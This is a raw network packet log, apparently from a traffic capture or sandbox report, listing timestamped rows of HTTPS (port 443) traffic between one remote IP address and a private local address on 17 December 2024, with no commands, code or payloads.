                                                                                                                                                                              Dec 17, 2024 18:12:56.744820118 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.744909048 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.832840919 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.833398104 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.840233088 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.840409040 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.847532034 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.847779036 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.856384039 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.857047081 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.862668991 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.862862110 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.869504929 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.869617939 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.875024080 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.875118971 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.882580042 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.882677078 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.888503075 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.888585091 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.894387960 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.894510984 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.900852919 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.901057959 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.906932116 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.907063007 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.914649963 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.914799929 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.920162916 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.920272112 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:56.926172018 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:56.926260948 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.023030996 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.023214102 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.026907921 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.027040005 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.031460047 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.031552076 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.037204981 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.037312984 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.041652918 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.041755915 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.046339989 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.046436071 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.052063942 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.052154064 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.056792974 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.057020903 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.061213017 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.061315060 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.065442085 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.065573931 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.070283890 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.070447922 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.073666096 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.074284077 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.078542948 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.078634024 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.082324028 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.082441092 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.087220907 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.087311029 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.091269016 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.091531992 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.094916105 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.095046997 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.222420931 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.222569942 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.226454020 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.226525068 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.229640961 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.229721069 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.232831955 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.232920885 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.236162901 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.236239910 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.240247965 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.240319967 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.243441105 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.243503094 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.246613979 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.246692896 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.249964952 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.250044107 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.254704952 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.254787922 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.257914066 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.257992983 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.261126995 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.261204004 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.264369011 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.264456987 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.268493891 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.268587112 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.271348000 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.271424055 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.274847984 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.274939060 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.414052010 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.414127111 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.417392969 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.417457104 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.420968056 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.421046972 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.424665928 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.424721956 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.424772024 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.427877903 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.427942991 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.432111979 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.432188034 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.434357882 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.434432983 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.438642979 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.438710928 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.441737890 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.441813946 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.444869995 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.444948912 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.448689938 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.448741913 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.448776960 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.451967001 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.452066898 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.456095934 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.456175089 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.459228039 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.459307909 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.462620020 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.462693930 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.466151953 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.466263056 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.605627060 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.605796099 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.608279943 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.608380079 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.612039089 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.612129927 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.615324974 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.615408897 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.619539022 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.619610071 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.622701883 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.622792006 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.625900984 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.625988007 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.629816055 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.629952908 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.632594109 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.632674932 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.636637926 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.636715889 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.640357971 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.640454054 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.643532991 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.643613100 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.647073030 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.647243023 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.650120974 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.650228024 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.654206038 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.654309988 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.657340050 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.657423973 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.660486937 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.660561085 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.799448013 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.799531937 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.803709030 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.803788900 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.806826115 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.806909084 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.810132027 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.810223103 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.813244104 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.813340902 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.816463947 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.816586018 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.820697069 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.820782900 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.823868036 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.823961973 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.827370882 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.827492952 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.830532074 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.830625057 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.834225893 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.834317923 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.838274956 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.838393927 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.841486931 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.841569901 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.845496893 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.845587969 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.868716002 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.868808031 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.871994972 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.872076988 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.992341042 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.992434025 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.995575905 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.995666027 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:57.998562098 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:57.998625994 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.002801895 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.002871037 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.006036997 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.006118059 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.009495974 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.009567022 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.013498068 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.013571024 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.016731024 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.016819954 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.020004034 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.020072937 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.023307085 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.023386002 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.027425051 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.027517080 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.030288935 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.030360937 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.034550905 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.034626007 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.037451982 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.037544012 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.060489893 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.060600996 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.063393116 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.063457966 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.186250925 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.186395884 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.188368082 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.188456059 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.192727089 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.192801952 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.195615053 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.195692062 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.198998928 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.199084044 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.202199936 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.202261925 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.206322908 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.206398964 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.209522963 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.209609985 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.212850094 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.212918043 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.216074944 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.216145039 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.219818115 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.219940901 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.223867893 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.223948002 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.227140903 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.227268934 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.230432034 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.230532885 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.234204054 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.234286070 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.265350103 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.265507936 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.268560886 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.268639088 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.379782915 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.379878998 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.383116007 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.383223057 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.386395931 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.386470079 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.390377045 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.390444994 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.393742085 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.393810034 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.397015095 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.397085905 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.400192976 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.403124094 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.404266119 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.404362917 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.407510996 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.407582998 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.410898924 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.410967112 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.414345026 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.414421082 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.417783976 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.417845011 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.421794891 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.421860933 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.425017118 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.425121069 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.456769943 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.456855059 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.460192919 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:58.460268974 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:58.571144104 CET4434973898.142.240.215192.168.2.4
